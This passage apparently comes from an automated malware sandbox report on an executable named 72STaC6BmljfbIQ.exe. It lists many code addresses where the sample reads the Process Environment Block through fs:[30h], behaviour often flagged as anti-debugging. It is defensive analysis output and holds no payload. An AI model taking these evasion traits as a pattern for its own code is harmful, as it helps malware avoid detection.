                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122E10E mov eax, dword ptr fs:[00000030h]6_2_0122E10E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122E10E mov ecx, dword ptr fs:[00000030h]6_2_0122E10E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122E10E mov eax, dword ptr fs:[00000030h]6_2_0122E10E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122E10E mov ecx, dword ptr fs:[00000030h]6_2_0122E10E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01240115 mov eax, dword ptr fs:[00000030h]6_2_01240115
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122A118 mov ecx, dword ptr fs:[00000030h]6_2_0122A118
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122A118 mov eax, dword ptr fs:[00000030h]6_2_0122A118
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122A118 mov eax, dword ptr fs:[00000030h]6_2_0122A118
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122A118 mov eax, dword ptr fs:[00000030h]6_2_0122A118
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B0124 mov eax, dword ptr fs:[00000030h]6_2_011B0124
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117C156 mov eax, dword ptr fs:[00000030h]6_2_0117C156
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01186154 mov eax, dword ptr fs:[00000030h]6_2_01186154
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01186154 mov eax, dword ptr fs:[00000030h]6_2_01186154
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01214144 mov eax, dword ptr fs:[00000030h]6_2_01214144
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01214144 mov eax, dword ptr fs:[00000030h]6_2_01214144
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01214144 mov ecx, dword ptr fs:[00000030h]6_2_01214144
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01214144 mov eax, dword ptr fs:[00000030h]6_2_01214144
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01214144 mov eax, dword ptr fs:[00000030h]6_2_01214144
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01218158 mov eax, dword ptr fs:[00000030h]6_2_01218158
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117A197 mov eax, dword ptr fs:[00000030h]6_2_0117A197
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117A197 mov eax, dword ptr fs:[00000030h]6_2_0117A197
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117A197 mov eax, dword ptr fs:[00000030h]6_2_0117A197
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C0185 mov eax, dword ptr fs:[00000030h]6_2_011C0185
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01224180 mov eax, dword ptr fs:[00000030h]6_2_01224180
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01224180 mov eax, dword ptr fs:[00000030h]6_2_01224180
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0123C188 mov eax, dword ptr fs:[00000030h]6_2_0123C188
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0123C188 mov eax, dword ptr fs:[00000030h]6_2_0123C188
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120019F mov eax, dword ptr fs:[00000030h]6_2_0120019F
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120019F mov eax, dword ptr fs:[00000030h]6_2_0120019F
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120019F mov eax, dword ptr fs:[00000030h]6_2_0120019F
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120019F mov eax, dword ptr fs:[00000030h]6_2_0120019F
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012561E5 mov eax, dword ptr fs:[00000030h]6_2_012561E5
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FE1D0 mov eax, dword ptr fs:[00000030h]6_2_011FE1D0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FE1D0 mov eax, dword ptr fs:[00000030h]6_2_011FE1D0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FE1D0 mov ecx, dword ptr fs:[00000030h]6_2_011FE1D0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FE1D0 mov eax, dword ptr fs:[00000030h]6_2_011FE1D0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FE1D0 mov eax, dword ptr fs:[00000030h]6_2_011FE1D0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B01F8 mov eax, dword ptr fs:[00000030h]6_2_011B01F8
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012461C3 mov eax, dword ptr fs:[00000030h]6_2_012461C3
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012461C3 mov eax, dword ptr fs:[00000030h]6_2_012461C3
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119E016 mov eax, dword ptr fs:[00000030h]6_2_0119E016
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119E016 mov eax, dword ptr fs:[00000030h]6_2_0119E016
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119E016 mov eax, dword ptr fs:[00000030h]6_2_0119E016
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119E016 mov eax, dword ptr fs:[00000030h]6_2_0119E016
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01216030 mov eax, dword ptr fs:[00000030h]6_2_01216030
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01204000 mov ecx, dword ptr fs:[00000030h]6_2_01204000
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01222000 mov eax, dword ptr fs:[00000030h]6_2_01222000
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01222000 mov eax, dword ptr fs:[00000030h]6_2_01222000
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01222000 mov eax, dword ptr fs:[00000030h]6_2_01222000
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01222000 mov eax, dword ptr fs:[00000030h]6_2_01222000
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01222000 mov eax, dword ptr fs:[00000030h]6_2_01222000
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01222000 mov eax, dword ptr fs:[00000030h]6_2_01222000
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01222000 mov eax, dword ptr fs:[00000030h]6_2_01222000
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01222000 mov eax, dword ptr fs:[00000030h]6_2_01222000
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117A020 mov eax, dword ptr fs:[00000030h]6_2_0117A020
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117C020 mov eax, dword ptr fs:[00000030h]6_2_0117C020
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01182050 mov eax, dword ptr fs:[00000030h]6_2_01182050
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AC073 mov eax, dword ptr fs:[00000030h]6_2_011AC073
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01206050 mov eax, dword ptr fs:[00000030h]6_2_01206050
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012180A8 mov eax, dword ptr fs:[00000030h]6_2_012180A8
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118208A mov eax, dword ptr fs:[00000030h]6_2_0118208A
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012460B8 mov eax, dword ptr fs:[00000030h]6_2_012460B8
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012460B8 mov ecx, dword ptr fs:[00000030h]6_2_012460B8
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012060E0 mov eax, dword ptr fs:[00000030h]6_2_012060E0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117C0F0 mov eax, dword ptr fs:[00000030h]6_2_0117C0F0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C20F0 mov ecx, dword ptr fs:[00000030h]6_2_011C20F0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011880E9 mov eax, dword ptr fs:[00000030h]6_2_011880E9
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117A0E3 mov ecx, dword ptr fs:[00000030h]6_2_0117A0E3
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012020DE mov eax, dword ptr fs:[00000030h]6_2_012020DE
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117C310 mov ecx, dword ptr fs:[00000030h]6_2_0117C310
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A0310 mov ecx, dword ptr fs:[00000030h]6_2_011A0310
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BA30B mov eax, dword ptr fs:[00000030h]6_2_011BA30B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BA30B mov eax, dword ptr fs:[00000030h]6_2_011BA30B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BA30B mov eax, dword ptr fs:[00000030h]6_2_011BA30B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122437C mov eax, dword ptr fs:[00000030h]6_2_0122437C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01202349 mov eax, dword ptr fs:[00000030h]6_2_01202349
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01202349 mov eax, dword ptr fs:[00000030h]6_2_01202349
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01202349 mov eax, dword ptr fs:[00000030h]6_2_01202349
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01202349 mov eax, dword ptr fs:[00000030h]6_2_01202349
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01202349 mov eax, dword ptr fs:[00000030h]6_2_01202349
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01202349 mov eax, dword ptr fs:[00000030h]6_2_01202349
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01202349 mov eax, dword ptr fs:[00000030h]6_2_01202349
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01202349 mov eax, dword ptr fs:[00000030h]6_2_01202349
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01202349 mov eax, dword ptr fs:[00000030h]6_2_01202349
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01202349 mov eax, dword ptr fs:[00000030h]6_2_01202349
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01202349 mov eax, dword ptr fs:[00000030h]6_2_01202349
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01202349 mov eax, dword ptr fs:[00000030h]6_2_01202349
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01202349 mov eax, dword ptr fs:[00000030h]6_2_01202349
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01202349 mov eax, dword ptr fs:[00000030h]6_2_01202349
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01202349 mov eax, dword ptr fs:[00000030h]6_2_01202349
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01228350 mov ecx, dword ptr fs:[00000030h]6_2_01228350
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124A352 mov eax, dword ptr fs:[00000030h]6_2_0124A352
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120035C mov eax, dword ptr fs:[00000030h]6_2_0120035C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120035C mov eax, dword ptr fs:[00000030h]6_2_0120035C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120035C mov eax, dword ptr fs:[00000030h]6_2_0120035C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120035C mov ecx, dword ptr fs:[00000030h]6_2_0120035C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120035C mov eax, dword ptr fs:[00000030h]6_2_0120035C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120035C mov eax, dword ptr fs:[00000030h]6_2_0120035C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01178397 mov eax, dword ptr fs:[00000030h]6_2_01178397
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01178397 mov eax, dword ptr fs:[00000030h]6_2_01178397
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01178397 mov eax, dword ptr fs:[00000030h]6_2_01178397
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A438F mov eax, dword ptr fs:[00000030h]6_2_011A438F
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A438F mov eax, dword ptr fs:[00000030h]6_2_011A438F
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117E388 mov eax, dword ptr fs:[00000030h]6_2_0117E388
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117E388 mov eax, dword ptr fs:[00000030h]6_2_0117E388
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117E388 mov eax, dword ptr fs:[00000030h]6_2_0117E388
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118A3C0 mov eax, dword ptr fs:[00000030h]6_2_0118A3C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118A3C0 mov eax, dword ptr fs:[00000030h]6_2_0118A3C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118A3C0 mov eax, dword ptr fs:[00000030h]6_2_0118A3C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118A3C0 mov eax, dword ptr fs:[00000030h]6_2_0118A3C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118A3C0 mov eax, dword ptr fs:[00000030h]6_2_0118A3C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118A3C0 mov eax, dword ptr fs:[00000030h]6_2_0118A3C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011883C0 mov eax, dword ptr fs:[00000030h]6_2_011883C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011883C0 mov eax, dword ptr fs:[00000030h]6_2_011883C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011883C0 mov eax, dword ptr fs:[00000030h]6_2_011883C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011883C0 mov eax, dword ptr fs:[00000030h]6_2_011883C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012063C0 mov eax, dword ptr fs:[00000030h]6_2_012063C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B63FF mov eax, dword ptr fs:[00000030h]6_2_011B63FF
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119E3F0 mov eax, dword ptr fs:[00000030h]6_2_0119E3F0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119E3F0 mov eax, dword ptr fs:[00000030h]6_2_0119E3F0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119E3F0 mov eax, dword ptr fs:[00000030h]6_2_0119E3F0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0123C3CD mov eax, dword ptr fs:[00000030h]6_2_0123C3CD
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011903E9 mov eax, dword ptr fs:[00000030h]6_2_011903E9
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011903E9 mov eax, dword ptr fs:[00000030h]6_2_011903E9
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011903E9 mov eax, dword ptr fs:[00000030h]6_2_011903E9
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011903E9 mov eax, dword ptr fs:[00000030h]6_2_011903E9
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011903E9 mov eax, dword ptr fs:[00000030h]6_2_011903E9
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011903E9 mov eax, dword ptr fs:[00000030h]6_2_011903E9
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011903E9 mov eax, dword ptr fs:[00000030h]6_2_011903E9
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011903E9 mov eax, dword ptr fs:[00000030h]6_2_011903E9
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012243D4 mov eax, dword ptr fs:[00000030h]6_2_012243D4
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012243D4 mov eax, dword ptr fs:[00000030h]6_2_012243D4
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122E3DB mov eax, dword ptr fs:[00000030h]6_2_0122E3DB
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122E3DB mov eax, dword ptr fs:[00000030h]6_2_0122E3DB
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122E3DB mov ecx, dword ptr fs:[00000030h]6_2_0122E3DB
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122E3DB mov eax, dword ptr fs:[00000030h]6_2_0122E3DB
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117823B mov eax, dword ptr fs:[00000030h]6_2_0117823B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01186259 mov eax, dword ptr fs:[00000030h]6_2_01186259
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117A250 mov eax, dword ptr fs:[00000030h]6_2_0117A250
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01230274 mov eax, dword ptr fs:[00000030h]6_2_01230274
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01230274 mov eax, dword ptr fs:[00000030h]6_2_01230274
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01230274 mov eax, dword ptr fs:[00000030h]6_2_01230274
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01230274 mov eax, dword ptr fs:[00000030h]6_2_01230274
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01230274 mov eax, dword ptr fs:[00000030h]6_2_01230274
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01230274 mov eax, dword ptr fs:[00000030h]6_2_01230274
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01230274 mov eax, dword ptr fs:[00000030h]6_2_01230274
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01230274 mov eax, dword ptr fs:[00000030h]6_2_01230274
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01230274 mov eax, dword ptr fs:[00000030h]6_2_01230274
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01230274 mov eax, dword ptr fs:[00000030h]6_2_01230274
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01230274 mov eax, dword ptr fs:[00000030h]6_2_01230274
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01230274 mov eax, dword ptr fs:[00000030h]6_2_01230274
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01208243 mov eax, dword ptr fs:[00000030h]6_2_01208243
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01208243 mov ecx, dword ptr fs:[00000030h]6_2_01208243
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01184260 mov eax, dword ptr fs:[00000030h]6_2_01184260
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01184260 mov eax, dword ptr fs:[00000030h]6_2_01184260
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01184260 mov eax, dword ptr fs:[00000030h]6_2_01184260
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117826B mov eax, dword ptr fs:[00000030h]6_2_0117826B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012162A0 mov eax, dword ptr fs:[00000030h]6_2_012162A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012162A0 mov ecx, dword ptr fs:[00000030h]6_2_012162A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012162A0 mov eax, dword ptr fs:[00000030h]6_2_012162A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012162A0 mov eax, dword ptr fs:[00000030h]6_2_012162A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012162A0 mov eax, dword ptr fs:[00000030h]6_2_012162A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012162A0 mov eax, dword ptr fs:[00000030h]6_2_012162A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BE284 mov eax, dword ptr fs:[00000030h]6_2_011BE284
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BE284 mov eax, dword ptr fs:[00000030h]6_2_011BE284
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01200283 mov eax, dword ptr fs:[00000030h]6_2_01200283
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01200283 mov eax, dword ptr fs:[00000030h]6_2_01200283
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01200283 mov eax, dword ptr fs:[00000030h]6_2_01200283
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011902A0 mov eax, dword ptr fs:[00000030h]6_2_011902A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011902A0 mov eax, dword ptr fs:[00000030h]6_2_011902A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118A2C3 mov eax, dword ptr fs:[00000030h]6_2_0118A2C3
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118A2C3 mov eax, dword ptr fs:[00000030h]6_2_0118A2C3
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118A2C3 mov eax, dword ptr fs:[00000030h]6_2_0118A2C3
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118A2C3 mov eax, dword ptr fs:[00000030h]6_2_0118A2C3
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118A2C3 mov eax, dword ptr fs:[00000030h]6_2_0118A2C3
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011902E1 mov eax, dword ptr fs:[00000030h]6_2_011902E1
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011902E1 mov eax, dword ptr fs:[00000030h]6_2_011902E1
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011902E1 mov eax, dword ptr fs:[00000030h]6_2_011902E1
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01216500 mov eax, dword ptr fs:[00000030h]6_2_01216500
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AE53E mov eax, dword ptr fs:[00000030h]6_2_011AE53E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AE53E mov eax, dword ptr fs:[00000030h]6_2_011AE53E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AE53E mov eax, dword ptr fs:[00000030h]6_2_011AE53E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AE53E mov eax, dword ptr fs:[00000030h]6_2_011AE53E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AE53E mov eax, dword ptr fs:[00000030h]6_2_011AE53E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01254500 mov eax, dword ptr fs:[00000030h]6_2_01254500
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01254500 mov eax, dword ptr fs:[00000030h]6_2_01254500
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01254500 mov eax, dword ptr fs:[00000030h]6_2_01254500
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01254500 mov eax, dword ptr fs:[00000030h]6_2_01254500
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01254500 mov eax, dword ptr fs:[00000030h]6_2_01254500
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01254500 mov eax, dword ptr fs:[00000030h]6_2_01254500
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01254500 mov eax, dword ptr fs:[00000030h]6_2_01254500
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190535 mov eax, dword ptr fs:[00000030h]6_2_01190535
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190535 mov eax, dword ptr fs:[00000030h]6_2_01190535
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190535 mov eax, dword ptr fs:[00000030h]6_2_01190535
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190535 mov eax, dword ptr fs:[00000030h]6_2_01190535
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190535 mov eax, dword ptr fs:[00000030h]6_2_01190535
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190535 mov eax, dword ptr fs:[00000030h]6_2_01190535
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01188550 mov eax, dword ptr fs:[00000030h]6_2_01188550
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01188550 mov eax, dword ptr fs:[00000030h]6_2_01188550
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B656A mov eax, dword ptr fs:[00000030h]6_2_011B656A
